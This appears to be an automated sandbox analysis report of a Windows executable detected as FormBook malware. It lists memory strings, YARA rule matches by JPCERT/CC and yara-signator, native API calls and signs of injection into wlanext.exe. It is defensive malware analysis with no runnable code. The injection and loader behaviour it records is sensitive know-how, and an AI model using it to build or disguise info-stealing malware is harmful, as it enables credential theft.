Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-user-jurgen-klopp-19941053
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004181BC NtCreateFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041826B NtReadFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004182EA NtClose,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013697A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369950 NtQueueApcThread,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013699D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369820 NtEnumerateKey,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136B040 NtSuspendThread,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013698A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369B00 NtSetValueKey,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A10 NtQuerySection,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369560 NtWriteFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013695F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136A770 NtOpenThread,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369770 NtSetInformationFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369760 NtOpenProcess,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01369650 NtQueryValueKey,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013696D0 NtCreateKey,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039698F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039695F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03969560 NtWriteFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82F0 NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE8270 NtReadFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE83A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81C0 NtCreateFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE82EA NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE826B NtReadFile,
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE81BC NtCreateFile,
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015B8E10
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00401030
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041CAB3
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00408C60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041BC8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402D90
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B758
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00402FB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F900
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FE824
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E1002
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F20A8
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B090
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F28EC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2B28
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135EBB0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EDBD2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F22AE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01320D20
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2D07
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1D55
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352581
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133D5E0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F25DD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133841F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED466
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1FF1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013FDFCE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01346E30
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013ED616
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395EBB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EDBD2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2B28
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F22AE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392F900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B090
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F20A8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F28EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E1002
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1FF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03946E30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F25DD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F2D07
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03920D20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1D55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393841F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039ED466
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EECAB3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB758
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEBC8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0392B150 appears 35 times
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: String function: 0132B150 appears 35 times
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.719959307.00000000052A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: originalfilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725224710.0000000006550000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.725096915.0000000006460000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.708791475.0000000000ACE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.724929316.0000000006210000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.712443613.0000000003DF9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.720152538.00000000052B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000007.00000002.660956521.00000000001FE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000008.00000000.661485381.000000000004E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000000.662706033.00000000008DE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716188410.00000000015AF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716529184.0000000002F92000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
